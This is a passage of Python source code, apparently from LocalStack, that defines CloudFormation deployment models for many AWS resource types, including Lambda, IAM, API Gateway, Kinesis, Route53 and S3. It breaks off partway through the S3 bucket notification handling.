class EventsRule(GenericBaseModel):
    """ Deployment model for AWS::Events::Rule resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Events::Rule'

    def get_cfn_attribute(self, attribute_name):
        # Fix: previously read `self.params`, which is never defined on
        # GenericBaseModel (would raise AttributeError); use `self.props`,
        # the merged template/deployment-state properties.
        if attribute_name == 'Arn':
            return self.props.get('Arn') or aws_stack.events_rule_arn(self.props.get('Name'))
        return super(EventsRule, self).get_cfn_attribute(attribute_name)

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('Name')

    def fetch_state(self, stack_name, resources):
        """ Return the rule description from the events API, or None if not deployed. """
        rule_name = self.resolve_refs_recursively(stack_name, self.props.get('Name'), resources)
        result = aws_stack.connect_to_service('events').describe_rule(Name=rule_name) or {}
        return result if result.get('Name') else None
class EventBus(GenericBaseModel):
    """ Deployment model for AWS::Events::EventBus resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Events::EventBus'

    def fetch_state(self, stack_name, resources):
        """ Return the event bus description, or None if no physical ID is known yet. """
        bus_arn = self.physical_resource_id
        if not bus_arn:
            return None
        # the bus name is the part after the '/' in the ARN
        bus_name = bus_arn.split('/')[1]
        events = aws_stack.connect_to_service('events')
        return events.describe_event_bus(Name=bus_name)
class LogsLogGroup(GenericBaseModel):
    """ Deployment model for AWS::Logs::LogGroup resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Logs::LogGroup'

    def get_cfn_attribute(self, attribute_name):
        # Fix: previously read `self.params`, which is never defined on
        # GenericBaseModel (would raise AttributeError); use `self.props`.
        if attribute_name == 'Arn':
            return self.props.get('Arn') or aws_stack.log_group_arn(self.props.get('LogGroupName'))
        return super(LogsLogGroup, self).get_cfn_attribute(attribute_name)

    def fetch_state(self, stack_name, resources):
        """ Return the log group with an exactly matching name, or None. """
        group_name = self.props.get('LogGroupName')
        group_name = self.resolve_refs_recursively(stack_name, group_name, resources)
        logs = aws_stack.connect_to_service('logs')
        # describe_log_groups matches by prefix, so filter for the exact name
        groups = logs.describe_log_groups(logGroupNamePrefix=group_name)['logGroups']
        return ([g for g in groups if g['logGroupName'] == group_name] or [None])[0]
class CloudFormationStack(GenericBaseModel):
    """ Deployment model for nested AWS::CloudFormation::Stack resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::CloudFormation::Stack'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('StackId')

    def fetch_state(self, stack_name, resources):
        """ Return the first matching nested stack description, or None. """
        client = aws_stack.connect_to_service('cloudformation')
        nested_stack_name = self.resolve_refs_recursively(
            stack_name, self.props['StackName'], resources)
        stacks = client.describe_stacks(StackName=nested_stack_name).get('Stacks') or [None]
        return stacks[0]

    @classmethod
    def get_deploy_templates(cls):
        def get_nested_stack_params(params, **kwargs):
            # convert template parameters to the create_stack API shape;
            # booleans become lowercase strings, everything else str()
            def _to_str(value):
                return str(value).lower() if isinstance(value, bool) else str(value)
            stack_params = [
                {'ParameterKey': key, 'ParameterValue': _to_str(value)}
                for key, value in params.get('Parameters', {}).items()
            ]
            return {
                'StackName': params['StackName'],
                'TemplateURL': params.get('TemplateURL'),
                'Parameters': stack_params
            }
        return {
            'create': {
                'function': 'create_stack',
                'parameters': get_nested_stack_params
            }
        }
class LambdaFunction(GenericBaseModel):
    """ Deployment model for AWS::Lambda::Function resources. """
    @staticmethod
    def cloudformation_type():
        return 'AWS::Lambda::Function'
    def fetch_state(self, stack_name, resources):
        """ Return the function configuration/code details from the Lambda API. """
        func_name = self.resolve_refs_recursively(stack_name, self.props['FunctionName'], resources)
        return aws_stack.connect_to_service('lambda').get_function(FunctionName=func_name)
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # Ref returns the function name; Fn::GetAtt 'Arn' returns the ARN
        func_name = self.props.get('FunctionName')
        if attribute == 'Arn':
            return aws_stack.lambda_function_arn(func_name)
        return func_name
    def update_resource(self, new_resource, stack_name, resources):
        """ Update function code (if given and not inline) and configuration. """
        props = new_resource['Properties']
        client = aws_stack.connect_to_service('lambda')
        # only these configuration keys are forwarded to update_function_configuration
        keys = ('FunctionName', 'Role', 'Handler', 'Description', 'Timeout', 'MemorySize', 'Environment', 'Runtime')
        update_props = dict([(k, props[k]) for k in keys if k in props])
        update_props = self.resolve_refs_recursively(stack_name, update_props, resources)
        if 'Timeout' in update_props:
            update_props['Timeout'] = int(update_props['Timeout'])
        if 'Code' in props:
            code = props['Code'] or {}
            # inline ZipFile code is handled elsewhere; only update from S3/image locations
            if not code.get('ZipFile'):
                LOG.debug('Updating code for Lambda "%s" from location: %s' % (props['FunctionName'], code))
                client.update_function_code(FunctionName=props['FunctionName'], **code)
        if 'Environment' in update_props:
            # environment variable values must be strings for the Lambda API
            environment_variables = update_props['Environment'].get('Variables', {})
            update_props['Environment']['Variables'] = {k: str(v) for k, v in environment_variables.items()}
        return client.update_function_configuration(**update_props)
class LambdaFunctionVersion(GenericBaseModel):
    """ Deployment model for AWS::Lambda::Version resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Lambda::Version'

    def fetch_state(self, stack_name, resources):
        """ Return the published version entry matching the function name/ARN, or None. """
        name = self.resolve_refs_recursively(stack_name, self.props.get('FunctionName'), resources)
        if not name:
            return None
        function_name = aws_stack.lambda_function_name(name)
        # a fully qualified ARN carries the version as the 8th ':'-separated part
        parts = name.split(':')
        func_version = parts[7] if len(parts) > 7 else '$LATEST'
        versions = aws_stack.connect_to_service('lambda').list_versions_by_function(
            FunctionName=function_name)
        matching = [v for v in versions['Versions'] if v['Version'] == func_version]
        return (matching or [None])[0]
class LambdaEventSourceMapping(GenericBaseModel):
    """ Deployment model for AWS::Lambda::EventSourceMapping resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Lambda::EventSourceMapping'

    def fetch_state(self, stack_name, resources):
        """ Return the mapping for (function, source ARN); raise if not found. """
        props = self.props
        resource_id = props['FunctionName'] or self.resource_id
        resource_id = self.resolve_refs_recursively(stack_name, resource_id, resources)
        source_arn = self.resolve_refs_recursively(
            stack_name, props.get('EventSourceArn'), resources)
        if not resource_id or not source_arn:
            raise Exception('ResourceNotFound')
        func_arn = aws_stack.lambda_function_arn(resource_id)
        mappings = aws_stack.connect_to_service('lambda').list_event_source_mappings(
            FunctionName=resource_id, EventSourceArn=source_arn)
        matching = [
            m for m in mappings['EventSourceMappings']
            if m['EventSourceArn'] == source_arn and m['FunctionArn'] == func_arn
        ]
        if not matching:
            raise Exception('ResourceNotFound')
        return matching[0]

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('UUID')
class LambdaPermission(GenericBaseModel):
    """ Deployment model for AWS::Lambda::Permission resources. """
    @staticmethod
    def cloudformation_type():
        return 'AWS::Lambda::Permission'
    def fetch_state(self, stack_name, resources):
        """ Look up the permission as a statement inside the IAM policy that
            LocalStack maintains per Lambda function; return it or None. """
        iam = aws_stack.connect_to_service('iam')
        props = self.props
        # permissions are stored in an IAM policy named after the function
        policy_name = LAMBDA_POLICY_NAME_PATTERN % props.get('FunctionName')
        policy_arn = aws_stack.policy_arn(policy_name)
        policy = iam.get_policy(PolicyArn=policy_arn)['Policy']
        version = policy.get('DefaultVersionId')
        policy = iam.get_policy_version(PolicyArn=policy_arn, VersionId=version)['PolicyVersion']
        statements = policy['Document']['Statement']
        statements = statements if isinstance(statements, list) else [statements]
        func_arn = aws_stack.lambda_function_arn(props['FunctionName'])
        principal = props.get('Principal')
        # match on action + resource, and (when given) on the principal in any
        # of its possible representations
        existing = [s for s in statements if s['Action'] == props['Action'] and
            s['Resource'] == func_arn and
            (not principal or s['Principal'] in [principal, {'Service': principal}, {'Service': [principal]}])]
        return existing[0] if existing else None
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # return statement ID here to indicate that the resource has been deployed
        return self.props.get('Sid')
class LambdaEventInvokeConfig(GenericBaseModel):
    """ Deployment model for AWS::Lambda::EventInvokeConfig resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Lambda::EventInvokeConfig'

    def fetch_state(self, stack_name, resources):
        """ Return the event invoke config for the function/qualifier. """
        client = aws_stack.connect_to_service('lambda')
        props = self.props
        # Fix: the qualifier must come from the 'Qualifier' property;
        # previously 'FunctionName' was mistakenly looked up a second time.
        result = client.get_function_event_invoke_config(
            FunctionName=props.get('FunctionName'),
            Qualifier=props.get('Qualifier', '$LATEST'))
        return result

    def get_physical_resource_id(self, attribute=None, **kwargs):
        props = self.props
        return 'lambdaconfig-%s-%s' % (props.get('FunctionName'), props.get('Qualifier'))

    # @staticmethod added for consistency with the base class declaration
    # and the other resource models in this module
    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'put_function_event_invoke_config'
            },
            'delete': {
                'function': 'delete_function_event_invoke_config',
                'parameters': {
                    'FunctionName': 'FunctionName',
                    'Qualifier': 'Qualifier'
                }
            }
        }
class ElasticsearchDomain(GenericBaseModel):
    """ Deployment model for AWS::Elasticsearch::Domain resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Elasticsearch::Domain'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        # Ref returns the domain name; Fn::GetAtt 'Arn' returns the ARN
        name = self._domain_name()
        return aws_stack.elasticsearch_domain_arn(name) if attribute == 'Arn' else name

    def fetch_state(self, stack_name, resources):
        name = self.resolve_refs_recursively(stack_name, self._domain_name(), resources)
        es_client = aws_stack.connect_to_service('es')
        return es_client.describe_elasticsearch_domain(DomainName=name)

    def _domain_name(self):
        # fall back to the logical resource ID when no explicit name is set
        return self.props.get('DomainName') or self.resource_id
class FirehoseDeliveryStream(GenericBaseModel):
    """ Deployment model for AWS::KinesisFirehose::DeliveryStream resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::KinesisFirehose::DeliveryStream'

    def fetch_state(self, stack_name, resources):
        # fall back to the logical resource ID when no explicit name is set
        name = self.props.get('DeliveryStreamName') or self.resource_id
        name = self.resolve_refs_recursively(stack_name, name, resources)
        firehose = aws_stack.connect_to_service('firehose')
        return firehose.describe_delivery_stream(DeliveryStreamName=name)
class KinesisStream(GenericBaseModel):
    """ Deployment model for AWS::Kinesis::Stream resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Kinesis::Stream'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return aws_stack.kinesis_stream_arn(self.props.get('Name'))

    def fetch_state(self, stack_name, resources):
        name = self.resolve_refs_recursively(stack_name, self.props['Name'], resources)
        kinesis = aws_stack.connect_to_service('kinesis')
        return kinesis.describe_stream(StreamName=name)
class KinesisStreamConsumer(GenericBaseModel):
    """ Deployment model for AWS::Kinesis::StreamConsumer resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Kinesis::StreamConsumer'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('ConsumerARN')

    def fetch_state(self, stack_name, resources):
        """ Return the registered consumer matching ConsumerName, or None. """
        props = self.props
        stream_arn = self.resolve_refs_recursively(stack_name, props['StreamARN'], resources)
        result = aws_stack.connect_to_service('kinesis').list_stream_consumers(StreamARN=stream_arn)
        result = [r for r in result['Consumers'] if r['ConsumerName'] == props['ConsumerName']]
        return (result or [None])[0]

    # @staticmethod added for consistency with the base class declaration
    # and the other resource models in this module
    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'register_stream_consumer'
            },
            'delete': {
                'function': 'deregister_stream_consumer'
            }
        }
class Route53RecordSet(GenericBaseModel):
    """ Deployment model for AWS::Route53::RecordSet resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::Route53::RecordSet'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('Name')  # Ref attribute is the domain name itself

    def fetch_state(self, stack_name, resources):
        """ Return the record set matching (Name, Type) in the hosted zone, or None. """
        route53 = aws_stack.connect_to_service('route53')
        props = self.props
        result = route53.list_resource_record_sets(HostedZoneId=props['HostedZoneId'])['ResourceRecordSets']
        result = [r for r in result if r['Name'] == props['Name'] and r['Type'] == props['Type']]
        return (result or [None])[0]

    # @staticmethod added for consistency with the base class declaration
    # and the other resource models in this module
    @staticmethod
    def get_deploy_templates():
        def param_change_batch(params, **kwargs):
            attr_names = ['Name', 'Type', 'SetIdentifier', 'Weight', 'Region', 'GeoLocation',
                'Failover', 'MultiValueAnswer', 'TTL', 'ResourceRecords', 'AliasTarget', 'HealthCheckId']
            attrs = select_attributes(params, attr_names)
            # default EvaluateTargetHealth when an AliasTarget is present
            # (no effect when 'AliasTarget' is absent from attrs)
            alias_target = attrs.get('AliasTarget', {})
            alias_target['EvaluateTargetHealth'] = alias_target.get('EvaluateTargetHealth', False)
            return {
                'Comment': params.get('Comment', ''),
                'Changes': [{
                    'Action': 'CREATE',
                    'ResourceRecordSet': attrs
                }]
            }
        return {
            'create': {
                'function': 'change_resource_record_sets',
                'parameters': {
                    'HostedZoneId': 'HostedZoneId',
                    'ChangeBatch': param_change_batch
                }
            }
        }
class SFNStateMachine(GenericBaseModel):
    """ Deployment model for AWS::StepFunctions::StateMachine resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::StepFunctions::StateMachine'

    def get_resource_name(self):
        return self.props.get('StateMachineName')

    def fetch_state(self, stack_name, resources):
        """ Find the state machine by name and return its description, or None. """
        sm_name = self.props.get('StateMachineName') or self.resource_id
        sm_name = self.resolve_refs_recursively(stack_name, sm_name, resources)
        sfn_client = aws_stack.connect_to_service('stepfunctions')
        machines = sfn_client.list_state_machines()['stateMachines']
        matching_arns = [m['stateMachineArn'] for m in machines if m['name'] == sm_name]
        if not matching_arns:
            return None
        return sfn_client.describe_state_machine(stateMachineArn=matching_arns[0])

    def update_resource(self, new_resource, stack_name, resources):
        """ Push the (possibly updated) definition to the state machine. """
        client = aws_stack.connect_to_service('stepfunctions')
        sm_arn = self.props.get('stateMachineArn')
        if not sm_arn:
            # lazily resolve the ARN from the deployed state
            self.state = self.fetch_state(stack_name=stack_name, resources=resources)
            sm_arn = self.state['stateMachineArn']
        definition = new_resource['Properties']['DefinitionString']
        return client.update_state_machine(stateMachineArn=sm_arn, definition=definition)
class SFNActivity(GenericBaseModel):
    """ Deployment model for AWS::StepFunctions::Activity resources. """

    @staticmethod
    def cloudformation_type():
        return 'AWS::StepFunctions::Activity'

    def fetch_state(self, stack_name, resources):
        """ Return the activity description, or None if no physical ID is known yet. """
        activity_arn = self.physical_resource_id
        if not activity_arn:
            return None
        sfn_client = aws_stack.connect_to_service('stepfunctions')
        return sfn_client.describe_activity(activityArn=activity_arn)
class IAMRole(GenericBaseModel, MotoRole):
    """ Deployment model for AWS::IAM::Role resources (backed by moto's Role). """

    @staticmethod
    def cloudformation_type():
        return 'AWS::IAM::Role'

    def get_resource_name(self):
        return self.props.get('RoleName')

    def fetch_state(self, stack_name, resources):
        role_name = self.resolve_refs_recursively(stack_name, self.props.get('RoleName'), resources)
        iam = aws_stack.connect_to_service('iam')
        return iam.get_role(RoleName=role_name)['Role']

    def update_resource(self, new_resource, stack_name, resources):
        props = new_resource['Properties']
        iam = aws_stack.connect_to_service('iam')
        description = props.get('Description') or ''
        return iam.update_role(RoleName=props.get('RoleName'), Description=description)
class IAMPolicy(GenericBaseModel):
    """ Deployment model for AWS::IAM::Policy (inline policy) resources. """
    @staticmethod
    def cloudformation_type():
        return 'AWS::IAM::Policy'
    def fetch_state(self, stack_name, resources):
        return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=False)
    @classmethod
    def get_deploy_templates(cls):
        def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
            """ Attach the inline policy to all Roles/Users/Groups listed in the properties. """
            iam = aws_stack.connect_to_service('iam')
            props = resources[resource_id]['Properties']
            cls.resolve_refs_recursively(stack_name, props, resources)
            policy_doc = json.dumps(remove_none_values(props['PolicyDocument']))
            policy_name = props['PolicyName']
            for role in props.get('Roles', []):
                iam.put_role_policy(RoleName=role, PolicyName=policy_name, PolicyDocument=policy_doc)
            for user in props.get('Users', []):
                iam.put_user_policy(UserName=user, PolicyName=policy_name, PolicyDocument=policy_doc)
            for group in props.get('Groups', []):
                iam.put_group_policy(GroupName=group, PolicyName=policy_name, PolicyDocument=policy_doc)
            return {}
        return {'create': {'function': _create}}
    @staticmethod
    def get_policy_state(obj, stack_name, resources, managed_policy=False):
        """ Collect the deployment state of an (inline or managed) policy across
            all Roles/Users/Groups it is attached to; returns None if nothing found. """
        def _filter(pols):
            # keep only attachments matching this policy's name
            return [p for p in pols['AttachedPolicies'] if p['PolicyName'] == policy_name]
        iam = aws_stack.connect_to_service('iam')
        props = obj.props
        policy_name = props.get('PolicyName') or props.get('ManagedPolicyName')
        result = {}
        roles = props.get('Roles', [])
        users = props.get('Users', [])
        groups = props.get('Groups', [])
        if managed_policy:
            result['policy'] = iam.get_policy(PolicyArn=aws_stack.policy_arn(policy_name))
        # managed policies are looked up via list_attached_*; inline via get_*_policy
        for role in roles:
            role = obj.resolve_refs_recursively(stack_name, role, resources)
            policies = (_filter(iam.list_attached_role_policies(RoleName=role)) if managed_policy else
                iam.get_role_policy(RoleName=role, PolicyName=policy_name))
            result['role:%s' % role] = policies
        for user in users:
            user = obj.resolve_refs_recursively(stack_name, user, resources)
            policies = (_filter(iam.list_attached_user_policies(UserName=user)) if managed_policy else
                iam.get_user_policy(UserName=user, PolicyName=policy_name))
            result['user:%s' % user] = policies
        for group in groups:
            group = obj.resolve_refs_recursively(stack_name, group, resources)
            policies = (_filter(iam.list_attached_group_policies(GroupName=group)) if managed_policy else
                iam.get_group_policy(GroupName=group, PolicyName=policy_name))
            result['group:%s' % group] = policies
        # drop empty entries; None signals "not deployed"
        result = {k: v for k, v in result.items() if v}
        return result or None
class IAMManagedPolicy(GenericBaseModel):
    """CloudFormation model for AWS::IAM::ManagedPolicy."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::IAM::ManagedPolicy'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        # note: reuses role_arn() to construct an ARN-like id for the policy
        return aws_stack.role_arn(self.props['ManagedPolicyName'])

    def fetch_state(self, stack_name, resources):
        # delegate to the shared inline/managed policy state lookup
        return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=True)

    @classmethod
    def get_deploy_templates(cls):
        def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
            """Create the managed policy and attach it to all roles/users/groups."""
            iam = aws_stack.connect_to_service('iam')
            resource = resources[resource_id]
            props = resource['Properties']
            cls.resolve_refs_recursively(stack_name, props, resources)
            policy_doc = json.dumps(props['PolicyDocument'])
            policy = iam.create_policy(PolicyName=props['ManagedPolicyName'], PolicyDocument=policy_doc)
            policy_arn = policy['Policy']['Arn']
            # Roles/Users/Groups live in the resource *properties* - reading them
            # from the resource dict itself (as before) silently skipped all
            # attachments, since those keys never exist at the top level
            for role in props.get('Roles', []):
                iam.attach_role_policy(RoleName=role, PolicyArn=policy_arn)
            for user in props.get('Users', []):
                iam.attach_user_policy(UserName=user, PolicyArn=policy_arn)
            for group in props.get('Groups', []):
                iam.attach_group_policy(GroupName=group, PolicyArn=policy_arn)
            return {}
        return {'create': {'function': _create}}
class GatewayResponse(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::GatewayResponse."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::GatewayResponse'

    def fetch_state(self, stack_name, resources):
        """Look up the deployed gateway response; None when absent/unresolvable."""
        resolved_api = self.resolve_refs_recursively(stack_name, self.props['RestApiId'], resources)
        if not resolved_api:
            return
        apigateway = aws_stack.connect_to_service('apigateway')
        response = apigateway.get_gateway_response(
            restApiId=resolved_api, responseType=self.props['ResponseType'])
        if 'responseType' in response:
            return response
        return None
class GatewayRestAPI(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::RestApi."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::RestApi'
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # 'id' is assigned by the API Gateway backend on creation
        return self.props.get('id')
    def fetch_state(self, stack_name, resources):
        """Look up the REST API by name; None if it does not exist yet."""
        apis = aws_stack.connect_to_service('apigateway').get_rest_apis()['items']
        api_name = self.props.get('Name') or self.resource_id
        api_name = self.resolve_refs_recursively(stack_name, api_name, resources)
        result = list(filter(lambda api: api['name'] == api_name, apis))
        return result[0] if result else None
    @staticmethod
    def get_deploy_templates():
        def _api_id(params, resources, resource_id, **kwargs):
            # resolve the REST API id of the deployed resource for deletion
            resource = GatewayRestAPI(resources[resource_id])
            return resource.physical_resource_id or resource.get_physical_resource_id()
        return {
            'create': {
                'function': 'create_rest_api',
                'parameters': {
                    'name': 'Name',
                    'description': 'Description'
                }
            },
            'delete': {
                'function': 'delete_rest_api',
                'parameters': {
                    'restApiId': _api_id,
                }
            }
        }
class GatewayDeployment(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::Deployment."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::Deployment'

    def fetch_state(self, stack_name, resources):
        """Return the first deployment of the referenced REST API, if any."""
        rest_api_id = self.props.get('RestApiId') or self.resource_id
        rest_api_id = self.resolve_refs_recursively(stack_name, rest_api_id, resources)
        if not rest_api_id:
            return None
        client = aws_stack.connect_to_service('apigateway')
        deployments = client.get_deployments(restApiId=rest_api_id)['items']
        # TODO possibly filter results by stage name or other criteria
        if not deployments:
            return None
        return deployments[0]
class GatewayResource(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::Resource."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::Resource'
    def fetch_state(self, stack_name, resources):
        """Find the API resource matching parent id + path part, verified by full path."""
        props = self.props
        api_id = props.get('RestApiId') or self.resource_id
        api_id = self.resolve_refs_recursively(stack_name, api_id, resources)
        parent_id = self.resolve_refs_recursively(stack_name, props.get('ParentId'), resources)
        if not api_id or not parent_id:
            # dependencies not yet resolvable -> resource not deployed
            return None
        api_resources = aws_stack.connect_to_service('apigateway').get_resources(restApiId=api_id)['items']
        target_resource = list(filter(lambda res:
            res.get('parentId') == parent_id and res['pathPart'] == props['PathPart'], api_resources))
        if not target_resource:
            return None
        # compare via the fully qualified path to disambiguate equal path parts
        path = aws_stack.get_apigateway_path_for_resource(api_id,
            target_resource[0]['id'], resources=api_resources)
        result = list(filter(lambda res: res['path'] == path, api_resources))
        return result[0] if result else None
class GatewayMethod(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::Method."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::Method'
    def fetch_state(self, stack_name, resources):
        """Return the deployed method, additionally matching AWS_PROXY integrations."""
        props = self.props
        api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
        res_id = self.resolve_refs_recursively(stack_name, props['ResourceId'], resources)
        if not api_id or not res_id:
            return None
        res_obj = aws_stack.connect_to_service('apigateway').get_resource(restApiId=api_id, resourceId=res_id)
        # resourceMethods maps HTTP verb -> method details; match either key or value
        match = [v for (k, v) in res_obj.get('resourceMethods', {}).items()
            if props['HttpMethod'] in (v.get('httpMethod'), k)]
        int_props = props.get('Integration') or {}
        if int_props.get('Type') == 'AWS_PROXY':
            # for proxy integrations also require matching integration type/verb
            match = [m for m in match if
                m.get('methodIntegration', {}).get('type') == 'AWS_PROXY' and
                m.get('methodIntegration', {}).get('httpMethod') == int_props.get('IntegrationHttpMethod')]
        return match[0] if match else None
    def update_resource(self, new_resource, stack_name, resources):
        """Apply updates: put_integration when Integration is set, else put_method."""
        props = new_resource['Properties']
        client = aws_stack.connect_to_service('apigateway')
        integration = props.get('Integration')
        kwargs = {
            'restApiId': props['RestApiId'],
            'resourceId': props['ResourceId'],
            'httpMethod': props['HttpMethod'],
            'requestParameters': props.get('RequestParameters') or {}
        }
        if integration:
            kwargs['type'] = integration['Type']
            if integration.get('IntegrationHttpMethod'):
                kwargs['integrationHttpMethod'] = integration.get('IntegrationHttpMethod')
            if integration.get('Uri'):
                kwargs['uri'] = integration.get('Uri')
            return client.put_integration(**kwargs)
        kwargs['authorizationType'] = props.get('AuthorizationType')
        return client.put_method(**kwargs)
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # composite id: "<rest-api-id>-<resource-id>-<http-method>"
        props = self.props
        result = '%s-%s-%s' % (props.get('RestApiId'), props.get('ResourceId'), props.get('HttpMethod'))
        return result
class GatewayStage(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::Stage."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::Stage'

    def fetch_state(self, stack_name, resources):
        """Fetch the stage by API id + StageName; None if the API is unresolvable."""
        rest_api_id = self.props.get('RestApiId') or self.resource_id
        rest_api_id = self.resolve_refs_recursively(stack_name, rest_api_id, resources)
        if not rest_api_id:
            return None
        client = aws_stack.connect_to_service('apigateway')
        return client.get_stage(restApiId=rest_api_id, stageName=self.props['StageName'])

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('id')
class GatewayUsagePlan(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::UsagePlan."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::UsagePlan'
    def fetch_state(self, stack_name, resources):
        """Find the usage plan by name; None if not created yet."""
        plan_name = self.props.get('UsagePlanName')
        plan_name = self.resolve_refs_recursively(stack_name, plan_name, resources)
        result = aws_stack.connect_to_service('apigateway').get_usage_plans().get('items', [])
        result = [r for r in result if r['name'] == plan_name]
        return (result or [None])[0]
    @staticmethod
    def get_deploy_templates():
        # nested CamelCase template structures are lower-cased for the boto call
        return {
            'create': {
                'function': 'create_usage_plan',
                'parameters': {
                    'name': 'UsagePlanName',
                    'description': 'Description',
                    'apiStages': lambda_keys_to_lower('ApiStages'),
                    'quota': lambda_keys_to_lower('Quota'),
                    'throttle': lambda_keys_to_lower('Throttle'),
                    'tags': params_list_to_dict('Tags')
                }
            }
        }
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # 'id' is assigned by the API Gateway backend on creation
        return self.props.get('id')
class GatewayApiKey(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::ApiKey."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::ApiKey'
    def fetch_state(self, stack_name, resources):
        """Find the API key by name (and CustomerId, when configured)."""
        props = self.props
        key_name = self.resolve_refs_recursively(stack_name, props.get('Name'), resources)
        cust_id = props.get('CustomerId')
        result = aws_stack.connect_to_service('apigateway').get_api_keys().get('items', [])
        result = [r for r in result if r.get('name') == key_name and cust_id in (None, r.get('customerId'))]
        return (result or [None])[0]
    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_api_key',
                'parameters': {
                    'description': 'Description',
                    'customerId': 'CustomerId',
                    'name': 'Name',
                    'value': 'Value',
                    'enabled': 'Enabled',
                    'stageKeys': lambda_keys_to_lower('StageKeys'),
                    'tags': params_list_to_dict('Tags')
                },
                # coerce the template value into a boolean for the boto call
                'types': {
                    'enabled': bool
                }
            }
        }
    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('id')
class GatewayUsagePlanKey(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::UsagePlanKey."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::ApiGateway::UsagePlanKey'
    def fetch_state(self, stack_name, resources):
        """Find the usage-plan key by id (and type, when configured)."""
        client = aws_stack.connect_to_service('apigateway')
        key_id = self.resolve_refs_recursively(stack_name, self.props.get('KeyId'), resources)
        key_type = self.resolve_refs_recursively(stack_name, self.props.get('KeyType'), resources)
        plan_id = self.resolve_refs_recursively(stack_name, self.props.get('UsagePlanId'), resources)
        result = client.get_usage_plan_keys(usagePlanId=plan_id).get('items', [])
        result = [r for r in result if r['id'] == key_id and key_type in [None, r.get('type')]]
        return (result or [None])[0]
    @staticmethod
    def get_deploy_templates():
        # all CamelCase properties are lower-cased for the boto call
        return {
            'create': {
                'function': 'create_usage_plan_key',
                'parameters': lambda_keys_to_lower()
            }
        }
    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('id')
class GatewayModel(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::Model (type mapping only)."""

    @staticmethod
    def cloudformation_type():
        # resource type string this model handles
        return 'AWS::ApiGateway::Model'
class GatewayAccount(GenericBaseModel):
    """CloudFormation model for AWS::ApiGateway::Account (type mapping only)."""

    @staticmethod
    def cloudformation_type():
        # resource type string this model handles
        return 'AWS::ApiGateway::Account'
class S3Bucket(GenericBaseModel, FakeBucket):
    """CloudFormation model for AWS::S3::Bucket (also inherits moto's FakeBucket)."""
    def get_resource_name(self):
        return self.normalize_bucket_name(self.props.get('BucketName'))
    @staticmethod
    def normalize_bucket_name(bucket_name):
        bucket_name = bucket_name or ''
        # AWS automatically converts upper to lower case chars in bucket names
        bucket_name = bucket_name.lower()
        return bucket_name
    @staticmethod
    def get_deploy_templates():
        def convert_acl_cf_to_s3(acl):
            """ Convert a CloudFormation ACL string (e.g., 'PublicRead') to an S3 ACL string (e.g., 'public-read') """
            return re.sub('(?<!^)(?=[A-Z])', '-', acl).lower()
        def s3_bucket_notification_config(params, **kwargs):
            """Translate the CF NotificationConfiguration into the S3 API shape."""
            notif_config = params.get('NotificationConfiguration')
            if not notif_config:
                return None
            lambda_configs = []
            queue_configs = []
            topic_configs = []
            # (CF property name, output list, target key in S3 shape, source key in CF shape)
            attr_tuples = (
                ('LambdaConfigurations', lambda_configs, 'LambdaFunctionArn', 'Function'),
                ('QueueConfigurations', queue_configs, 'QueueArn', 'Queue'),
                ('TopicConfigurations', topic_configs, 'TopicArn', 'Topic')
            )
            # prepare lambda/queue/topic notification configs
            for attrs in attr_tuples:
                for notif_cfg in notif_config.get(attrs[0]) or []:
